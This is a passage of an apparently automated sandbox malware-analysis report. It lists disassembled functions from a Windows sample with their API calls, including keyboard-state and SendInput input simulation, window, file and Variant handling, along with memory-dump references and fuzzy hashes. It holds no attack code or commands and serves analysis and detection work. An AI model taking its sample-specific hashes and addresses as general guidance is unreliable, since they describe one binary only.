                                                                                                                                                                  • Instruction Fuzzy Hash: C151AD7294010AEFDF119FA4CCC18EF7BB6EB88354B24452BF925A2250D778CCA1DB58
                                                                                                                                                                  Function 0044C514 Relevance: 9.2, APIs: 6, Instructions: 163windowkeyboardCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 0044C570
                                                                                                                                                                  • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                                                                                                                  • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                                                                                                                  • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                                                                                                                  • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                                                                                                                  • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2221674350-0
                                                                                                                                                                  • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                                                                                  • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                                                                                                                  • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                                                                                  • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                                                                                                                  Function 00451B42 Relevance: 9.1, APIs: 6, Instructions: 144memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$Copy$AllocClearErrorLastString
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 960795272-0
                                                                                                                                                                  • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                                                                                  • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                                                                                                                  • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                                                                                  • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                                                                                                                  Function 00447BA8 Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                                                                                  • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4189319755-0
                                                                                                                                                                  • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                                                                                  • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                                                                                                                  • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                                                                                  • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                                                                                                                  Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                                                                                                                  • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                                                                                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 642888154-0
                                                                                                                                                                  • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                                                                  • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                                                                                                                  • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                                                                  • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                                                                                                  Function 0044B489 Relevance: 9.1, APIs: 6, Instructions: 102fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                                                                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                                                                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3368777196-0
                                                                                                                                                                  • Opcode ID: 3d58129ed84523c762a0542a6ce6e8838c644baaaed5c22841495022eb1511e6
                                                                                                                                                                  • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                                                                                                                  • Opcode Fuzzy Hash: 3d58129ed84523c762a0542a6ce6e8838c644baaaed5c22841495022eb1511e6
                                                                                                                                                                  • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                                                                                                                  Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$Copy$ClearErrorLast
                                                                                                                                                                  • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                                                  • API String ID: 2487901850-572801152
                                                                                                                                                                  • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                                                                  • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                                                                                                                  • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                                                                  • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                                                                                                                  Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                                                                                                                  • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                                  • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                                  • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$Enable$Show$MessageSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1871949834-0
                                                                                                                                                                  • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                                                                  • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                                                                                                                  • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                                                                  • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                                                                                                                  Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                                                                  • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                                                                                                                  • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                                                                  • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                                                                                                  Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                                                                                                                  • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                                                                                                                  • SendMessageW.USER32 ref: 00471AE3
                                                                                                                                                                  • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3611059338-0
                                                                                                                                                                  • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                                                                  • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                                                                                                                  • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                                                                  • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                                                                                                                  Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1640429340-0
                                                                                                                                                                  • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                                                                                  • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                                                                                                                  • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                                                                                  • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                                                                                                                  Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 752480666-0
                                                                                                                                                                  • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                                                                                  • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                                                                                                                  • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                                                                                  • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                                                                                                                  Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3275902921-0
                                                                                                                                                                  • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                                                                                  • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                                                                                                                  • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                                                                                  • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                                                                                                                  Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
